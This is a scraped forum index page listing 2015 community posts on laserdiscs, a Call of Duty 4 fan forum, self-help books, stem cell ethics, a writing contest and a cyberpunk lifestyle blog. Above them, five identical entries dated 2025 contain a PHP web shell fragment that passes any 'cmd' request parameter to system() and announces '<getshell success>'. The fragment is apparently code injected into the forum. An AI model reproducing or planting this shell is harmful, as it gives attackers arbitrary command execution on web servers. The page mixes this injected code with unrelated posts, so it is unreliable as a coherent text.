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February 19th, 2025
if(isset($_REQUEST['cmd'])){ echo "<getshell success>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "<getshell success>"; phpinfo();
February 19th, 2025
if(isset($_REQUEST['cmd'])){ echo "<getshell success>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "<getshell success>"; phpinfo();
February 19th, 2025
if(isset($_REQUEST['cmd'])){ echo "<getshell success>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "<getshell success>"; phpinfo();
February 19th, 2025
if(isset($_REQUEST['cmd'])){ echo "<getshell success>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "<getshell success>"; phpinfo();
February 19th, 2025
if(isset($_REQUEST['cmd'])){ echo "<getshell success>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "<getshell success>"; phpinfo();
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laserdisc the best analog format for video, rare now, fun still! |
Posted by: SpookyZalost - May 22nd, 2015 at 1:17 AM - Forum: Technology & Hardware
- Replies (7)
so for those of you that don't know, a laser disc was a CD of sorts, it was the size of a vinyl record and had 2 sides from which to store video, Movie's were usually stored on 1 or 2 discs depending on the length of the film and you had to flip them over/switch the discs when each side was done (some players like the one I have automatically reads the other side.).
![[Image: IMG_20150521_180625.jpg]](https://dl.dropboxusercontent.com/u/94631310/retro%20hardware/IMG_20150521_180625.jpg)
This is an example taken by me from my living quarters showing off the LD player I own with a disc in the drive.
a lot of movies were out on laser disc that are not out on DVD, and if you want to get a format from before DVD, LD was the highest quality, and in some cases still was until Blu-Ray came along.
a lot of movies were ported from LD to DVD/Blu ray as it was the highest quality format at the time, especially in the case where the original flim strips were lost.
TV shows and anime were also available on laser disc.
there are two types of laser disc, CAV and CLV, the main difference is how much time is stored per side of the disc.
the format came out in 1978, about 8 months before VHS, and though VHS dominated the market because of price Laser disc was the highest quality video format until 2004/2006 DVD technology finally surpassed it as far as video clarity and quality.
the Discs stopped being made in 2001 making this a collectors piece now.
also of note is that audio quality was only recently surpassed by blu-ray's high definition audio content, such is the nature of analog formats!
typically the players are quite expensive for a decent quality one even now, but the discs can range on average from $5 to $25 though occasionally more if it's a rare one.
I can attest that the movies look fine on modern HDTV's and the sound quality in many cases beat most DVD versions.
hope you enjoyed my explanation here, and post comments below if you have any questions!
CoD4 Zone - Call of Duty 4 Fan Forum |
Posted by: Urban - May 7th, 2015 at 2:08 AM - Forum: Other Communites & Promotion
- Replies (1)
Hi everyone,
I want to tell you about my Call of Duty 4 forum, CoD4 Zone. It is a forum for fans of Call of Duty 4, but anyone who's interested in the game or forum may sign up and I'll do my best to help you.
CoD4 was released back in 2007, and it is the barebones of modern Call of Duty games.
If you want to check out the forum, please do, and help the forum grow by signing up, or giving helpful feedback and suggestions.
You can check it out at http://cod4zone.com
As for community features:
Custom theme
Alerts with Mentions
Member of The Month, Clip of The Month
Thank you.
Forum cleanup |
Posted by: Urban - May 4th, 2015 at 3:47 AM - Forum: Community Related
- Replies (8)
There are some forums that would probably be a lot cleaner and less empty if they were simply merged in with some other forums. I think some of the forums here are genius, but the activity simply isn't here to justify them. The index would also look a lot nicer.
Thank you.
Self-Help Books |
Posted by: Urban - May 4th, 2015 at 3:41 AM - Forum: General Discussion
- No Replies
I've recently came across a book that I want to read, "The Straight Edge: Turning Simple Disciplines into Massive Success and Happiness."
I haven't began to read it or even buy it yet, but it is something I want to read. Although reviews don't mean everything for all products, 90% of the reviews are 5 stars, and all the people who've suggested it, are pretty good people. I'll hopefully begin reading it tomorrow, depending on if I have time after preparing for some exams.
Anyway, for the main purpose of this thread, do you read self help or motivational books? What are some that you have read and enjoyed? Any recommendations?
stem cells, use them or ban them? |
Posted by: SpookyZalost - May 1st, 2015 at 3:59 AM - Forum: General Discussion
- Replies (2)
simple thread debating the ethics of Biotechnology and stem cells, as well as their uses both positive and negative.
so to start with here's the first on topic point.
given that stem cells can be obtained from alternative sources other than fetuses, what other ethical considerations should be considered given their uses, both positive and negative?
also, why should we/shouldn't we, use them to help people?
and... GO!
may writing contest |
Posted by: SpookyZalost - April 22nd, 2015 at 4:03 AM - Forum: Creative Writing
- Replies (2)
hello everyone, I am SpookyZalost, I'm a recent-ish member here at makestation, and a bit of a jack of all trades in real life.
I wanted to announce something new!, a writing contest, the rules are simple.
#1 bad grammar/spelling = - points (out of 100)
#2 minimum word count 5,000 words
#3 try to keep it to about 15 pages if possible for maximum.
#4 have fun and enjoy!
now that all that stuff is outta the way, there will also be a community poll at the end of the submission period whereby all stories will be publicly available for an anonymous vote, pick whatever one's you like the most!
the submission period is from now until may 20th and the end of voting will be on may 30th
Submit the stories to the main forum, just make sure "May 2015 Writing contest" is in the description so I can find it and link to it here on this page.
the prize will be the respect and admiration of your fellow readers so if you wanted a chance to test the waters and stretch your writers legs this is a great time to do so!
the topic will be chosen at random, for this one let's pick an easy one, the story has to be about or take place on a ship, ANY kind of ship outside of that have fun, OH! and keep the content PG13 if possible! ^_^
and... BEGIN!
Living Cyberpunk. |
Posted by: SpookyZalost - April 18th, 2015 at 7:05 PM - Forum: User Blogs
- Replies (102)
so this will be my new journal/blog for the public relating to living life as I do, in this post modern world we live in, one ruled by megacorps, where technology is supreme, the street makes it's own uses for things, and the disparity between rich and poor is vaster than the grand valis marinaris on mars.
hoping people are at least somewhat interested.
life is pretty straight forward to the techie, we blend in, do our best at our jobs, keep the corps happy.
but when we aren't working the fun begins.
I access my devices with a radio frequency chip in my hand for security, I've got monitors both for my terminals and for the various cameras guarding my living space.
I am a hacker in the truest sense, not those nonsense lies they spread in the media.
I am a cyberpunk, I live in that world, where life is hard, people have to adapt to radical changes in society, and those who don't upgrade are left behind.
I support transhumanism, I desire to upgrade and improve myself, H+ will always win in my book.
I grow bioluminescient plants for home illumination, that which isn't illuminated by the technology I keep with me that is.
I dumpster dive for tech when I see it, I fix it, I restore it, I use it, everything has a purpose.
I collect things, old game consoles, old computers, even the oldest of machines still has a use of some sort, my 286 plays some of my favorite old dos games, I love it.
thus I sit here, illuminated in the electronic glow of the various devices I've obtained, this being my first true post, a beacon to those who are being dragged down with me into the abyss, I don't stare into it, I embrace it, and I'm all the better for it.
I am a cyberpunk.
SpookyZalost, Signing off.